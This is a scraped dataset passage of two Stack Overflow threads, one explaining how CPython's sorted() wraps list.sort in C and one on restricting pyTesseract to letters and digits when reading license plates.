*seq, *callable; Which is creating a new list - even though list is mutable no? then why create a new one? and creating some other pointers, not sure why... then we unpack the rest of the arguments as the comment suggests, if it doesn't match the arguments there (being the function 'sorted' for example) then we break out.. I am pretty sure I am reading this all completely wrong, so I stopped here... Thanks for the help in advanced, sorry for the multiple questions but this block of code is blowing my mind and learning to read this would help me a lot!
[ "The actual sorting is done by list.sort. sorted simply creates a new list from whatever iterable argument it is given, sorts that list in-place, then returns it. A pure Python implementation of sorted might look like\ndef sorted(itr, *, key=None):\n newlist = list(itr)\n newlist.sort(key=key)\n return newlist\n\nMost of the C code is just boilerplate for working with the underlying C data structures, detecting and propagating errors, and doing memory management.\nThe actual sorting algorithm is spread throughout Objects/listobject.c; start here. If you are really interested in what the algorithm is, rather than how it is implemented in C, you may want to start with https://github.com/python/cpython/blob/main/Objects/listsort.txt instead.\n", "list sort implementation isn't there. This is a wrapper function fetching PyId_sort from there:\ncallable = _PyObject_GetAttrId(newlist, &PyId_sort);\n\nobject.h contains a macro using token pasting to define the PyId_xxx objects\n#define _Py_IDENTIFIER(varname) _Py_static_string(PyId_##varname, #varname)\n\n... and I stopped digging after that. There could be more macro magic involved in order to enforce a coherent naming through the whole python codebase.\nThe implementation is located here:\nhttps://github.com/python/cpython/blob/main/Objects/listobject.c\nMore precisely around line 2240\nstatic PyObject *\nlist_sort_impl(PyListObject *self, PyObject *keyfunc, int reverse)\n/*[clinic end generated code: output=57b9f9c5e23fbe42 input=cb56cd179a713060]*/\n{\n\nComments read:\n/* An adaptive, stable, natural mergesort. See listsort.txt.\n * Returns Py_None on success, NULL on error. Even in case of error, the\n * list will be some permutation of its input state (nothing is lost or\n * duplicated).\n */\n\nNow it takes some effort to understand the details of the algorithm but it's there.\n" ]
[ 1, 0 ]
[]
[]
[ "c", "cpython", "python" ]
stackoverflow_0074593461_c_cpython_python.txt
Q: pyTesseract recognize a pattern of text I'm trying to do a simple license plate recognizer. Currently my problem comes from Tesseract messing some readings (for example 5 as S). I know the images are always going to be three uppercase characters, followed by three digits, in the form AAA 999 or so. Is there any way I can give this info to the OCR? A: Tesseract allows to whitelist specific characters using the tessedit_char_whitelist parameter. A way to address your license plate identification problem would be to split your detection window in two "subwindows", and: whitelist letters for the first subwindow (tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZ) whitelist numbers for the second subwindow (tessedit_char_whitelist=0123456789)
pyTesseract recognize a pattern of text
I'm trying to do a simple license plate recognizer. Currently my problem comes from Tesseract messing some readings (for example 5 as S). I know the images are always going to be three uppercase characters, followed by three digits, in the form AAA 999 or so. Is there any way I can give this info to the OCR?
[ "Tesseract allows to whitelist specific characters using the tessedit_char_whitelist parameter.\nA way to address your license plate identification problem would be to split your detection window in two \"subwindows\", and:\n\nwhitelist letters for the first subwindow (tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZ)\nwhitelist numbers for the second subwindow (tessedit_char_whitelist=0123456789)\n\n" ]
[ 1 ]
[]
[]
[ "python", "python_tesseract", "tesseract" ]
stackoverflow_0074593614_python_python_tesseract_tesseract.txt